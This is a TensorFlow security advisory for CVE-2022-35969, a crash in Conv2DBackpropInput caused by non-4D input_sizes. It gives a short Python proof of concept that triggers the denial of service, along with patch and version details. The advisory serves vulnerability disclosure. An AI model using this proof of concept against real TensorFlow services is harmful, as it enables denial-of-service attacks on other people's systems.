## TFSA-2022-101: `CHECK` fail in `Conv2DBackpropInput`

### CVE Number
CVE-2022-35969

### Impact
The implementation of `Conv2DBackpropInput` requires `input_sizes` to be 4-dimensional. Otherwise, it gives a `CHECK` failure which can be used to trigger a denial of service attack:
```python
import tensorflow as tf

strides = [1, 1, 1, 1]
padding = "SAME"
use_cudnn_on_gpu = True
explicit_paddings = []
data_format = "NHWC"
dilations = [1, 1, 1, 1]
input_sizes = tf.constant([65534,65534], shape=[2], dtype=tf.int32)
filter = tf.constant(0.159749106, shape=[3,3,2,2], dtype=tf.float32)
out_backprop = tf.constant(0, shape=[], dtype=tf.float32)
tf.raw_ops.Conv2DBackpropInput(input_sizes=input_sizes, filter=filter, out_backprop=out_backprop, strides=strides, padding=padding, use_cudnn_on_gpu=use_cudnn_on_gpu, explicit_paddings=explicit_paddings, data_format=data_format, dilations=dilations)
```

### Patches
We have patched the issue in GitHub commit [50156d547b9a1da0144d7babe665cf690305b33c](https://github.com/tensorflow/tensorflow/commit/50156d547b9a1da0144d7babe665cf690305b33c).

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.


### For more information
Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.


### Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
